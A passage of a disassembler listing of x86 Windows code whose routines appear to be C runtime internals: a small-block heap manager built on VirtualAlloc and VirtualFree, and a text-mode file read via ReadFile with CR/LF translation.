dec byte ptr [ecx] jnz short loc_41E8BE mov ecx, [ebp+arg_0] and [ecx+4], ebx loc_41E8BE: ; CODE XREF: sub_41E680+214j ; sub_41E680+21Bj ... mov ebx, [ebp+arg_4] loc_41E8C1: ; CODE XREF: sub_41E680+1F8j mov ecx, [edi+8] mov esi, [edi+4] mov [ecx+4], esi mov ecx, [edi+4] mov esi, [edi+8] mov [ecx+8], esi mov esi, [ebp+arg_8] add esi, [ebp+var_4] mov [ebp+arg_8], esi sar esi, 4 dec esi cmp esi, 3Fh jbe short loc_41E8E8 push 3Fh pop esi loc_41E8E8: ; CODE XREF: sub_41E680+1DDj ; sub_41E680+263j mov ecx, [ebp+var_C] mov edi, [ecx+esi*8+4] lea ecx, [ecx+esi*8] mov [ebx+4], edi mov [ebx+8], ecx mov [ecx+4], ebx mov ecx, [ebx+4] mov [ecx+8], ebx mov ecx, [ebx+4] cmp ecx, [ebx+8] jnz short loc_41E965 mov cl, [esi+eax+4] cmp esi, 20h mov byte ptr [ebp+arg_4+3], cl inc cl mov [esi+eax+4], cl jnb short loc_41E93C cmp byte ptr [ebp+arg_4+3], 0 jnz short loc_41E92F mov edi, 80000000h mov ecx, esi shr edi, cl mov ecx, [ebp+arg_0] or [ecx], edi loc_41E92F: ; CODE XREF: sub_41E680+29Fj lea eax, [eax+edx*4+44h] mov edx, 80000000h mov ecx, esi jmp short loc_41E961 ; --------------------------------------------------------------------------- loc_41E93C: ; CODE XREF: sub_41E680+299j cmp byte ptr [ebp+arg_4+3], 0 jnz short loc_41E952 lea ecx, [esi-20h] mov edi, 80000000h shr edi, cl mov ecx, [ebp+arg_0] or [ecx+4], edi loc_41E952: ; CODE XREF: sub_41E680+2C0j lea eax, [eax+edx*4+0C4h] lea ecx, [esi-20h] mov edx, 80000000h loc_41E961: ; CODE XREF: sub_41E680+2BAj shr edx, cl or [eax], edx loc_41E965: ; CODE XREF: sub_41E680+287j mov eax, [ebp+arg_8] mov [ebx], eax mov [eax+ebx-4], eax loc_41E96E: ; CODE XREF: sub_41E680+1A2j ; sub_41E680:loc_41E82Ej push 1 pop eax loc_41E971: ; CODE XREF: sub_41E680+1A9j pop edi pop esi pop ebx leave retn sub_41E680 endp ; =============== S U B R O U T I N E ======================================= sub_41E976 proc near ; CODE XREF: sub_41DDD2+41p ; sub_41EC6E:loc_41EE3Dp cmp dword_43A9C0, 0FFFFFFFFh push ebx push ebp push esi push edi jnz short loc_41E98A mov esi, offset off_43A9B0 jmp short loc_41E9A7 ; --------------------------------------------------------------------------- loc_41E98A: ; CODE XREF: sub_41E976+Bj push 2020h push 0 push ds:dword_4DCFE4 call dword_427144 ; RtlAllocateHeap mov esi, eax test esi, esi jz loc_41EAB3 loc_41E9A7: ; CODE XREF: sub_41E976+12j mov ebp, dword_4271C4 push 4 push 2000h push 400000h push 0 call ebp ; VirtualAlloc mov edi, eax test edi, edi jz loc_41EA9C push 4 mov ebx, 10000h push 1000h push ebx push edi call ebp ; VirtualAlloc test eax, eax jz loc_41EA8E mov eax, offset off_43A9B0 cmp esi, eax jnz short loc_41EA06 cmp off_43A9B0, 0 jnz short loc_41E9F6 mov off_43A9B0, eax loc_41E9F6: ; CODE XREF: sub_41E976+79j cmp off_43A9B4, 0 jnz short loc_41EA1B mov off_43A9B4, eax jmp short loc_41EA1B ; --------------------------------------------------------------------------- loc_41EA06: ; CODE XREF: sub_41E976+70j mov [esi], eax mov eax, off_43A9B4 mov [esi+4], eax mov off_43A9B4, esi mov eax, [esi+4] mov [eax], esi loc_41EA1B: ; CODE XREF: sub_41E976+87j ; sub_41E976+8Ej lea eax, [edi+400000h] lea ecx, [esi+98h] mov [esi+14h], eax lea eax, [esi+18h] mov [esi+0Ch], ecx mov [esi+10h], edi mov [esi+8], eax xor ebp, ebp mov ecx, 0F1h loc_41EA3D: ; CODE XREF: sub_41E976+E2j xor edx, edx cmp ebp, 10h setnl dl dec edx and edx, ecx dec edx inc ebp mov [eax], edx mov [eax+4], ecx add eax, 8 cmp ebp, 400h jl short loc_41EA3D push ebx push 0 push edi call sub_41B590 add esp, 0Ch loc_41EA66: ; CODE XREF: sub_41E976+112j mov eax, [esi+10h] add eax, ebx cmp edi, eax jnb short loc_41EA8A or byte ptr [edi+0F8h], 0FFh lea eax, [edi+8] mov [edi], eax mov dword ptr [edi+4], 0F0h add edi, 1000h jmp short loc_41EA66 ; --------------------------------------------------------------------------- loc_41EA8A: ; CODE XREF: sub_41E976+F7j mov eax, esi jmp short loc_41EAB5 ; --------------------------------------------------------------------------- loc_41EA8E: ; CODE XREF: sub_41E976+63j push 8000h push 0 push edi call dword_4271C0 ; VirtualFree loc_41EA9C: ; CODE XREF: sub_41E976+4Bj cmp esi, offset off_43A9B0 jz short loc_41EAB3 push esi push 0 push ds:dword_4DCFE4 call dword_427140 ; RtlFreeHeap loc_41EAB3: ; CODE XREF: sub_41E976+2Bj ; sub_41E976+12Cj xor eax, eax loc_41EAB5: ; CODE XREF: sub_41E976+116j pop edi pop esi pop ebp pop ebx retn sub_41E976 endp ; =============== S U B R O U T I N E ======================================= sub_41EABA proc near ; CODE XREF: sub_41EB10+A5p arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] push 8000h push 0 push dword ptr [esi+10h] call dword_4271C0 ; VirtualFree cmp off_43C9D0, esi jnz short loc_41EADF mov eax, [esi+4] mov off_43C9D0, eax loc_41EADF: ; CODE XREF: sub_41EABA+1Bj cmp esi, offset off_43A9B0 jz short loc_41EB07 mov eax, [esi+4] mov ecx, [esi] push esi push 0 mov [eax], ecx mov eax, [esi] mov ecx, [esi+4] mov [eax+4], ecx push ds:dword_4DCFE4 call dword_427140 ; RtlFreeHeap pop esi retn ; --------------------------------------------------------------------------- loc_41EB07: ; CODE XREF: sub_41EABA+2Bj or dword_43A9C0, 0FFFFFFFFh pop esi retn sub_41EABA endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41EB10 proc near ; CODE XREF: sub_41EC29+3Ep var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx push ebx push esi mov esi, off_43A9B4 push edi loc_41EB1D: ; CODE XREF: sub_41EB10+B7j cmp dword ptr [esi+10h], 0FFFFFFFFh jz loc_41EBBB and [ebp+var_4], 0 lea edi, [esi+2010h] mov ebx, 3FF000h loc_41EB36: ; CODE XREF: sub_41EB10+72j cmp dword ptr [edi], 0F0h jnz short loc_41EB77 mov eax, ebx push 4000h add eax, [esi+10h] push 1000h push eax call dword_4271C0 ; VirtualFree test eax, eax jz short loc_41EB77 or dword ptr [edi], 0FFFFFFFFh dec ds:dword_4DB9D4 mov eax, [esi+0Ch] test eax, eax jz short loc_41EB6C cmp eax, edi jbe short loc_41EB6F loc_41EB6C: ; CODE XREF: sub_41EB10+56j mov [esi+0Ch], edi loc_41EB6F: ; CODE XREF: sub_41EB10+5Aj inc [ebp+var_4] dec [ebp+arg_0] jz short loc_41EB84 loc_41EB77: ; CODE XREF: sub_41EB10+2Cj ; sub_41EB10+46j sub ebx, 1000h sub edi, 8 test ebx, ebx jge short loc_41EB36 loc_41EB84: ; CODE XREF: sub_41EB10+65j cmp [ebp+var_4], 0 mov ecx, esi mov esi, [esi+4] jz short loc_41EBBB cmp dword ptr [ecx+18h], 0FFFFFFFFh jnz short loc_41EBBB push 1 lea eax, [ecx+20h] pop edx loc_41EB9B: ; CODE XREF: sub_41EB10+9Aj cmp dword ptr [eax], 0FFFFFFFFh jnz short loc_41EBAC inc edx add eax, 8 cmp edx, 400h jl short loc_41EB9B loc_41EBAC: ; CODE XREF: sub_41EB10+8Ej cmp edx, 400h jnz short loc_41EBBB push ecx call sub_41EABA pop ecx loc_41EBBB: ; CODE XREF: sub_41EB10+11j ; sub_41EB10+7Dj ... cmp esi, off_43A9B4 jz short loc_41EBCD cmp [ebp+arg_0], 0 jg loc_41EB1D loc_41EBCD: ; CODE XREF: sub_41EB10+B1j pop edi pop esi pop ebx leave retn sub_41EB10 endp ; =============== S U B R O U T I N E ======================================= sub_41EBD2 proc near ; CODE XREF: sub_41B0B1+3Ap ; sub_41B202+173p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch mov eax, [esp+arg_0] mov edx, offset off_43A9B0 push esi mov ecx, edx loc_41EBDE: ; CODE XREF: sub_41EBD2+1Cj cmp eax, [ecx+10h] jbe short loc_41EBE8 cmp eax, [ecx+14h] jb short loc_41EBF0 loc_41EBE8: ; CODE XREF: sub_41EBD2+Fj mov ecx, [ecx] cmp ecx, edx jz short loc_41EC25 jmp short loc_41EBDE ; --------------------------------------------------------------------------- loc_41EBF0: ; CODE XREF: sub_41EBD2+14j test al, 0Fh jnz short loc_41EC25 mov esi, eax mov edx, 100h and esi, 0FFFh cmp esi, edx jb short loc_41EC25 mov esi, [esp+4+arg_4] mov [esi], ecx mov esi, [esp+4+arg_8] mov ecx, eax and cx, 0F000h sub eax, ecx mov [esi], ecx sub eax, edx pop esi sar eax, 4 lea eax, [eax+ecx+8] retn ; --------------------------------------------------------------------------- loc_41EC25: ; CODE XREF: sub_41EBD2+1Aj ; sub_41EBD2+20j ... xor eax, eax pop esi retn sub_41EBD2 endp ; =============== S U B R O U T I N E ======================================= sub_41EC29 proc near ; CODE XREF: sub_41B0B1+4Dp ; sub_41B202+1D5p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch mov eax, [esp+arg_0] mov ecx, [esp+arg_4] sub ecx, [eax+10h] sar ecx, 0Ch lea eax, [eax+ecx*8+18h] mov ecx, [esp+arg_8] movzx edx, byte ptr [ecx] add [eax], edx and byte ptr [ecx], 0 cmp dword ptr [eax], 0F0h mov dword ptr [eax+4], 0F1h jnz short locret_41EC6D inc ds:dword_4DB9D4 cmp ds:dword_4DB9D4, 20h jnz short locret_41EC6D push 10h call sub_41EB10 pop ecx locret_41EC6D: ; CODE XREF: sub_41EC29+2Bj ; sub_41EC29+3Aj retn sub_41EC29 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41EC6E proc near ; CODE XREF: sub_41B202+1ACp ; sub_41B513+4Ap ... var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx push ecx push ebx push esi mov esi, off_43C9D0 push edi loc_41EC7C: ; CODE XREF: sub_41EC6E+C6j mov edx, [esi+10h] cmp edx, 0FFFFFFFFh jz loc_41ED27 mov edi, [esi+8] lea ecx, [esi+2018h] mov eax, edi sub eax, esi sub eax, 18h sar eax, 3 shl eax, 0Ch add eax, edx cmp edi, ecx mov [ebp+var_4], eax jnb short loc_41ECE1 loc_41ECA7: ; CODE XREF: sub_41EC6E+6Fj mov ecx, [edi] mov ebx, [ebp+arg_0] cmp ecx, ebx jl short loc_41ECCA cmp [edi+4], ebx jbe short loc_41ECCA push ebx push ecx push eax call sub_41EE76 add esp, 0Ch test eax, eax jnz short loc_41ED39 mov eax, [ebp+var_4] mov [edi+4], ebx loc_41ECCA: ; CODE XREF: sub_41EC6E+40j ; sub_41EC6E+45j add edi, 8 lea ecx, [esi+2018h] add eax, 1000h cmp edi, ecx mov [ebp+var_4], eax jb short loc_41ECA7 jmp short loc_41ECE4 ; --------------------------------------------------------------------------- loc_41ECE1: ; CODE XREF: sub_41EC6E+37j mov ebx, [ebp+arg_0] loc_41ECE4: ; CODE XREF: sub_41EC6E+71j mov eax, [esi+8] mov ecx, [esi+10h] lea edi, [esi+18h] mov [ebp+var_8], eax cmp edi, eax mov [ebp+var_4], ecx jnb short loc_41ED2A loc_41ECF7: ; CODE XREF: sub_41EC6E+B5j mov eax, [edi] cmp eax, ebx jl short loc_41ED16 cmp [edi+4], ebx jbe short loc_41ED16 push ebx push eax push [ebp+var_4] call sub_41EE76 add esp, 0Ch test eax, eax jnz short loc_41ED39 mov [edi+4], ebx loc_41ED16: ; CODE XREF: sub_41EC6E+8Dj ; sub_41EC6E+92j add [ebp+var_4], 1000h add edi, 8 cmp edi, [ebp+var_8] jb short loc_41ECF7 jmp short loc_41ED2A ; --------------------------------------------------------------------------- loc_41ED27: ; CODE XREF: sub_41EC6E+14j mov ebx, [ebp+arg_0] loc_41ED2A: ; CODE XREF: sub_41EC6E+87j ; sub_41EC6E+B7j mov esi, [esi] cmp esi, off_43C9D0 jz short loc_41ED49 jmp loc_41EC7C ; --------------------------------------------------------------------------- loc_41ED39: ; CODE XREF: sub_41EC6E+54j ; sub_41EC6E+A3j mov off_43C9D0, esi sub [edi], ebx mov [esi+8], edi jmp loc_41EE71 ; --------------------------------------------------------------------------- loc_41ED49: ; CODE XREF: sub_41EC6E+C4j mov eax, offset off_43A9B0 mov edi, eax loc_41ED50: ; CODE XREF: sub_41EC6E+F8j cmp dword ptr [edi+10h], 0FFFFFFFFh jz short loc_41ED5C cmp dword ptr [edi+0Ch], 0 jnz short loc_41ED68 loc_41ED5C: ; CODE XREF: sub_41EC6E+E6j mov edi, [edi] cmp edi, eax jz loc_41EE3D jmp short loc_41ED50 ; --------------------------------------------------------------------------- loc_41ED68: ; CODE XREF: sub_41EC6E+ECj mov ebx, [edi+0Ch] and [ebp+var_4], 0 mov esi, ebx mov eax, ebx sub esi, edi sub esi, 18h sar esi, 3 shl esi, 0Ch add esi, [edi+10h] cmp dword ptr [ebx], 0FFFFFFFFh jnz short loc_41ED97 loc_41ED86: ; CODE XREF: sub_41EC6E+127j cmp [ebp+var_4], 10h jge short loc_41ED97 add eax, 8 inc [ebp+var_4] cmp dword ptr [eax], 0FFFFFFFFh jz short loc_41ED86 loc_41ED97: ; CODE XREF: sub_41EC6E+116j ; sub_41EC6E+11Cj mov eax, [ebp+var_4] push 4 shl eax, 0Ch push 1000h push eax push esi mov [ebp+var_8], eax call dword_4271C4 ; VirtualAlloc cmp eax, esi jnz loc_41EE6F push 0 push [ebp+var_8] push esi call sub_41B590 mov edx, [ebp+var_4] add esp, 0Ch test edx, edx mov ecx, ebx jle short loc_41EDFE lea eax, [esi+4] mov [ebp+var_4], edx loc_41EDD4: ; CODE XREF: sub_41EC6E+18Ej or byte ptr [eax+0F4h], 0FFh lea edx, [eax+4] mov [eax-4], edx mov edx, 0F0h mov [eax], edx mov [ecx], edx mov dword ptr [ecx+4], 0F1h add eax, 1000h add ecx, 8 dec [ebp+var_4] jnz short loc_41EDD4 loc_41EDFE: ; CODE XREF: sub_41EC6E+15Ej mov off_43C9D0, edi lea eax, [edi+2018h] loc_41EE0A: ; CODE XREF: sub_41EC6E+1A8j cmp ecx, eax jnb short loc_41EE1A cmp dword ptr [ecx], 0FFFFFFFFh jz short loc_41EE18 add ecx, 8 jmp short loc_41EE0A ; --------------------------------------------------------------------------- loc_41EE18: ; CODE XREF: sub_41EC6E+1A3j cmp ecx, eax loc_41EE1A: ; CODE XREF: sub_41EC6E+19Ej sbb eax, eax and eax, ecx mov [edi+0Ch], eax mov eax, [ebp+arg_0] mov [esi+8], al mov [edi+8], ebx sub [ebx], eax sub [esi+4], eax lea ecx, [esi+eax+8] lea eax, [esi+100h] mov [esi], ecx jmp short loc_41EE71 ; --------------------------------------------------------------------------- loc_41EE3D: ; CODE XREF: sub_41EC6E+F2j call sub_41E976 test eax, eax jz short loc_41EE6F mov ecx, [eax+10h] mov [ecx+8], bl lea edx, [ecx+ebx+8] mov off_43C9D0, eax mov [ecx], edx mov edx, 0F0h sub edx, ebx mov [ecx+4], edx movzx edx, bl sub [eax+18h], edx lea eax, [ecx+100h] jmp short loc_41EE71 ; --------------------------------------------------------------------------- loc_41EE6F: ; CODE XREF: sub_41EC6E+143j ; sub_41EC6E+1D6j xor eax, eax loc_41EE71: ; CODE XREF: sub_41EC6E+D6j ; sub_41EC6E+1CDj ... pop edi pop esi pop ebx leave retn sub_41EC6E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41EE76 proc near ; CODE XREF: sub_41EC6E+4Ap ; sub_41EC6E+99p var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp push ecx mov ecx, [ebp+arg_0] mov edx, [ebp+arg_8] push ebx push esi mov esi, [ecx+4] push edi mov edi, [ecx] lea ebx, [ecx+0F8h] cmp esi, edx mov [ebp+var_4], edi mov eax, edi mov [ebp+arg_0], ebx jb short loc_41EEBB lea eax, [edi+edx] mov [edi], dl cmp eax, ebx jnb short loc_41EEAA add [ecx], edx sub [ecx+4], edx jmp short loc_41EEB3 ; --------------------------------------------------------------------------- loc_41EEAA: ; CODE XREF: sub_41EE76+2Bj and dword ptr [ecx+4], 0 lea eax, [ecx+8] mov [ecx], eax loc_41EEB3: ; CODE XREF: sub_41EE76+32j lea eax, [edi+8] jmp loc_41EF89 ; --------------------------------------------------------------------------- loc_41EEBB: ; CODE XREF: sub_41EE76+22j add esi, edi cmp byte ptr [esi], 0 jz short loc_41EEC4 mov eax, esi loc_41EEC4: ; CODE XREF: sub_41EE76+4Aj lea esi, [eax+edx] cmp esi, ebx jnb short loc_41EF0E loc_41EECB: ; CODE XREF: sub_41EE76+96j mov bl, [eax] test bl, bl jnz short loc_41EF01 push 1 lea ebx, [eax+1] pop esi loc_41EED7: ; CODE XREF: sub_41EE76+68j cmp byte ptr [ebx], 0 jnz short loc_41EEE0 inc ebx inc esi jmp short loc_41EED7 ; --------------------------------------------------------------------------- loc_41EEE0: ; CODE XREF: sub_41EE76+64j cmp esi, edx jnb short loc_41EF32 cmp eax, [ebp+var_4] jnz short loc_41EEEE mov [ecx+4], esi jmp short loc_41EEFA ; --------------------------------------------------------------------------- loc_41EEEE: ; CODE XREF: sub_41EE76+71j sub [ebp+arg_4], esi cmp [ebp+arg_4], edx jb loc_41EF93 loc_41EEFA: ; CODE XREF: sub_41EE76+76j mov edi, [ebp+var_4] mov eax, ebx jmp short loc_41EF06 ; --------------------------------------------------------------------------- loc_41EF01: ; CODE XREF: sub_41EE76+59j movzx esi, bl add eax, esi loc_41EF06: ; CODE XREF: sub_41EE76+89j lea esi, [eax+edx] cmp esi, [ebp+arg_0] jb short loc_41EECB loc_41EF0E: ; CODE XREF: sub_41EE76+53j lea esi, [ecx+8] loc_41EF11: ; CODE XREF: sub_41EE76+EBj ; sub_41EE76+F2j cmp esi, edi jnb short loc_41EF93 lea eax, [esi+edx] cmp eax, [ebp+arg_0] jnb short loc_41EF93 mov al, [esi] test al, al jnz short loc_41EF63 push 1 lea ebx, [esi+1] pop eax loc_41EF29: ; CODE XREF: sub_41EE76+BAj cmp byte ptr [ebx], 0 jnz short loc_41EF53 inc ebx inc eax jmp short loc_41EF29 ; --------------------------------------------------------------------------- loc_41EF32: ; CODE XREF: sub_41EE76+6Cj lea ebx, [eax+edx] cmp ebx, [ebp+arg_0] jnb short loc_41EF43 sub esi, edx mov [ecx], ebx mov [ecx+4], esi jmp short loc_41EF4C ; --------------------------------------------------------------------------- loc_41EF43: ; CODE XREF: sub_41EE76+C2j and dword ptr [ecx+4], 0 lea esi, [ecx+8] mov [ecx], esi loc_41EF4C: ; CODE XREF: sub_41EE76+CBj mov [eax], dl add eax, 8 jmp short loc_41EF89 ; --------------------------------------------------------------------------- loc_41EF53: ; CODE XREF: sub_41EE76+B6j cmp eax, edx jnb short loc_41EF6A sub [ebp+arg_4], eax cmp [ebp+arg_4], edx jb short loc_41EF93 mov esi, ebx jmp short loc_41EF11 ; --------------------------------------------------------------------------- loc_41EF63: ; CODE XREF: sub_41EE76+ABj movzx eax, al add esi, eax jmp short loc_41EF11 ; --------------------------------------------------------------------------- loc_41EF6A: ; CODE XREF: sub_41EE76+DFj lea ebx, [esi+edx] cmp ebx, [ebp+arg_0] jnb short loc_41EF7B sub eax, edx mov [ecx], ebx mov [ecx+4], eax jmp short loc_41EF84 ; --------------------------------------------------------------------------- loc_41EF7B: ; CODE XREF: sub_41EE76+FAj and dword ptr [ecx+4], 0 lea eax, [ecx+8] mov [ecx], eax loc_41EF84: ; CODE XREF: sub_41EE76+103j mov [esi], dl lea eax, [esi+8] loc_41EF89: ; CODE XREF: sub_41EE76+40j ; sub_41EE76+DBj imul ecx, 0Fh shl eax, 4 sub eax, ecx jmp short loc_41EF95 ; --------------------------------------------------------------------------- loc_41EF93: ; CODE XREF: sub_41EE76+7Ej ; sub_41EE76+9Dj ... xor eax, eax loc_41EF95: ; CODE XREF: sub_41EE76+11Bj pop edi pop esi pop ebx leave retn sub_41EE76 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41EF9A proc near ; CODE XREF: sub_41B202+19Ap var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp push ecx mov edx, [ebp+arg_8] push ebx mov ebx, [ebp+arg_4] push esi movzx ecx, byte ptr [edx] push edi mov edi, [ebp+arg_0] and [ebp+var_4], 0 mov eax, ebx sub eax, [edi+10h] sar eax, 0Ch cmp ecx, [ebp+arg_C] lea edi, [edi+eax*8+18h] jbe short loc_41EFD4 mov eax, [ebp+arg_C] sub ecx, eax mov [edx], al add [edi], ecx mov dword ptr [edi+4], 0F1h jmp short loc_41F034 ; --------------------------------------------------------------------------- loc_41EFD4: ; CODE XREF: sub_41EF9A+26j jnb short loc_41F03B mov eax, [ebp+arg_C] lea esi, [edx+eax] lea eax, [ebx+0F8h] cmp eax, esi jb short loc_41F03B lea eax, [ecx+edx] loc_41EFE9: ; CODE XREF: sub_41EF9A+59j cmp eax, esi jnb short loc_41EFF7 cmp byte ptr [eax], 0 jnz short loc_41EFF5 inc eax jmp short loc_41EFE9 ; --------------------------------------------------------------------------- loc_41EFF5: ; CODE XREF: sub_41EF9A+56j cmp eax, esi loc_41EFF7: ; CODE XREF: sub_41EF9A+51j jnz short loc_41F03B mov al, byte ptr [ebp+arg_C] mov [edx], al mov eax, [ebx] cmp edx, eax ja short loc_41F02F cmp esi, eax jbe short loc_41F02F lea eax, [ebx+0F8h] cmp esi, eax jnb short loc_41F026 xor eax, eax mov [ebx], esi cmp [esi], al jnz short loc_41F021 loc_41F01A: ; CODE XREF: sub_41EF9A+85j inc eax cmp byte ptr [esi+eax], 0 jz short loc_41F01A loc_41F021: ; CODE XREF: sub_41EF9A+7Ej mov [ebx+4], eax jmp short loc_41F02F ; --------------------------------------------------------------------------- loc_41F026: ; CODE XREF: sub_41EF9A+76j and dword ptr [ebx+4], 0 lea eax, [ebx+8] mov [ebx], eax loc_41F02F: ; CODE XREF: sub_41EF9A+68j ; sub_41EF9A+6Cj ... sub ecx, [ebp+arg_C] add [edi], ecx loc_41F034: ; CODE XREF: sub_41EF9A+38j mov [ebp+var_4], 1 loc_41F03B: ; CODE XREF: sub_41EF9A:loc_41EFD4j ; sub_41EF9A+4Aj ... mov eax, [ebp+var_4] pop edi pop esi pop ebx leave retn sub_41EF9A endp ; =============== S U B R O U T I N E ======================================= sub_41F043 proc near ; CODE XREF: sub_41B11A+A9p ; sub_41BB4F+2Dp ... arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] mov eax, [esi+0Ch] test al, 83h jz loc_41F117 test al, 40h jnz loc_41F117 test al, 2 jz short loc_41F069 or al, 20h mov [esi+0Ch], eax jmp loc_41F117 ; --------------------------------------------------------------------------- loc_41F069: ; CODE XREF: sub_41F043+1Aj or al, 1 test ax, 10Ch mov [esi+0Ch], eax jnz short loc_41F07D push esi call sub_4239EF pop ecx jmp short loc_41F082 ; --------------------------------------------------------------------------- loc_41F07D: ; CODE XREF: sub_41F043+2Fj mov eax, [esi+8] mov [esi], eax loc_41F082: ; CODE XREF: sub_41F043+38j push dword ptr [esi+18h] push dword ptr [esi+8] push dword ptr [esi+10h] call sub_41F11C add esp, 0Ch mov [esi+4], eax test eax, eax jz short loc_41F106 cmp eax, 0FFFFFFFFh jz short loc_41F106 mov edx, [esi+0Ch] test dl, 82h jnz short loc_41F0DB mov ecx, [esi+10h] push edi cmp ecx, 0FFFFFFFFh jz short loc_41F0C4 mov edi, ecx sar edi, 5 and ecx, 1Fh mov edi, ds:dword_4DCCA0[edi*4] lea edi, [edi+ecx*8] jmp short loc_41F0C9 ; --------------------------------------------------------------------------- loc_41F0C4: ; CODE XREF: sub_41F043+6Bj mov edi, offset dword_43D030 loc_41F0C9: ; CODE XREF: sub_41F043+7Fj mov cl, [edi+4] pop edi and cl, 82h cmp cl, 82h jnz short loc_41F0DB or dh, 20h mov [esi+0Ch], edx loc_41F0DB: ; CODE XREF: sub_41F043+62j ; sub_41F043+90j cmp dword ptr [esi+18h], 200h jnz short loc_41F0F8 mov ecx, [esi+0Ch] test cl, 8 jz short loc_41F0F8 test ch, 4 jnz short loc_41F0F8 mov dword ptr [esi+18h], 1000h loc_41F0F8: ; CODE XREF: sub_41F043+9Fj ; sub_41F043+A7j ... mov ecx, [esi] dec eax mov [esi+4], eax movzx eax, byte ptr [ecx] inc ecx mov [esi], ecx pop esi retn ; --------------------------------------------------------------------------- loc_41F106: ; CODE XREF: sub_41F043+55j ; sub_41F043+5Aj neg eax sbb eax, eax and eax, 10h add eax, 10h or [esi+0Ch], eax and dword ptr [esi+4], 0 loc_41F117: ; CODE XREF: sub_41F043+Aj ; sub_41F043+12j ... or eax, 0FFFFFFFFh pop esi retn sub_41F043 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41F11C proc near ; CODE XREF: sub_41B11A+90p ; sub_41F043+48p ... var_C = dword ptr -0Ch var_8 = dword ptr -8 var_1 = byte ptr -1 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 0Ch push ebx push esi mov esi, [ebp+arg_0] push edi cmp esi, ds:dword_4DCDA0 jnb loc_41F2F9 mov eax, esi and esi, 1Fh sar eax, 5 shl esi, 3 lea ebx, ds:4DCCA0h[eax*4] mov eax, ds:dword_4DCCA0[eax*4] add eax, esi mov dl, [eax+4] test dl, 1 jz loc_41F2F9 and [ebp+var_8], 0 mov edi, [ebp+arg_4] cmp [ebp+arg_8], 0 mov ecx, edi jz short loc_41F1D1 test dl, 2 jnz short loc_41F1D1 test dl, 48h jz short loc_41F191 mov al, [eax+5] cmp al, 0Ah jz short loc_41F191 dec [ebp+arg_8] mov [edi], al mov eax, [ebx] lea ecx, [edi+1] mov [ebp+var_8], 1 mov byte ptr [eax+esi+5], 0Ah loc_41F191: ; CODE XREF: sub_41F11C+56j ; sub_41F11C+5Dj lea eax, [ebp+var_C] push 0 push eax mov eax, [ebx] push [ebp+arg_8] push ecx push dword ptr [eax+esi] call dword_4270E8 ; ReadFile test eax, eax jnz short loc_41F1E4 call dword_42708C ; RtlGetLastWin32Error push 5 pop ecx cmp eax, ecx jnz short loc_41F1CC mov ds:dword_4DB958, 9 mov ds:dword_4DB95C, ecx jmp loc_41F30A ; --------------------------------------------------------------------------- loc_41F1CC: ; CODE XREF: sub_41F11C+99j cmp eax, 6Dh jnz short loc_41F1D8 loc_41F1D1: ; CODE XREF: sub_41F11C+4Cj ; sub_41F11C+51j xor eax, eax jmp loc_41F30D ; --------------------------------------------------------------------------- loc_41F1D8: ; CODE XREF: sub_41F11C+B3j push eax call sub_4203DF pop ecx jmp loc_41F30A ; --------------------------------------------------------------------------- loc_41F1E4: ; CODE XREF: sub_41F11C+8Cj mov eax, [ebx] mov edx, [ebp+var_C] add [ebp+var_8], edx lea ecx, [eax+esi+4] mov al, [eax+esi+4] test al, 80h jz loc_41F2F4 test edx, edx jz short loc_41F209 cmp byte ptr [edi], 0Ah jnz short loc_41F209 or al, 4 jmp short loc_41F20B ; --------------------------------------------------------------------------- loc_41F209: ; CODE XREF: sub_41F11C+E2j ; sub_41F11C+E7j and al, 0FBh loc_41F20B: ; CODE XREF: sub_41F11C+EBj mov [ecx], al mov eax, [ebp+arg_4] mov ecx, [ebp+var_8] mov [ebp+arg_8], eax add ecx, eax cmp eax, ecx mov [ebp+var_8], ecx jnb loc_41F2EE loc_41F223: ; CODE XREF: sub_41F11C+1BAj mov eax, [ebp+arg_8] mov al, [eax] cmp al, 1Ah jz loc_41F2DE cmp al, 0Dh jz short loc_41F23F mov [edi], al inc edi inc [ebp+arg_8] jmp loc_41F2D0 ; --------------------------------------------------------------------------- loc_41F23F: ; CODE XREF: sub_41F11C+116j dec ecx cmp [ebp+arg_8], ecx jnb short loc_41F25D mov eax, [ebp+arg_8] inc eax cmp byte ptr [eax], 0Ah jnz short loc_41F254 add [ebp+arg_8], 2 jmp short loc_41F2B2 ; --------------------------------------------------------------------------- loc_41F254: ; CODE XREF: sub_41F11C+130j mov byte ptr [edi], 0Dh inc edi mov [ebp+arg_8], eax jmp short loc_41F2D0 ; --------------------------------------------------------------------------- loc_41F25D: ; CODE XREF: sub_41F11C+127j lea eax, [ebp+var_C] push 0 push eax inc [ebp+arg_8] lea eax, [ebp+var_1] push 1 push eax mov eax, [ebx] push dword ptr [eax+esi] call dword_4270E8 ; ReadFile test eax, eax jnz short loc_41F285 call dword_42708C ; RtlGetLastWin32Error test eax, eax jnz short loc_41F2CC loc_41F285: ; CODE XREF: sub_41F11C+15Dj cmp [ebp+var_C], 0 jz short loc_41F2CC mov eax, [ebx] test byte ptr [eax+esi+4], 48h jz short loc_41F2A7 mov al, [ebp+var_1] cmp al, 0Ah jz short loc_41F2B2 mov byte ptr [edi], 0Dh mov ecx, [ebx] inc edi mov [ecx+esi+5], al jmp short loc_41F2D0 ; --------------------------------------------------------------------------- loc_41F2A7: ; CODE XREF: sub_41F11C+176j cmp edi, [ebp+arg_4] jnz short loc_41F2B7 cmp [ebp+var_1], 0Ah jnz short loc_41F2B7 loc_41F2B2: ; CODE XREF: 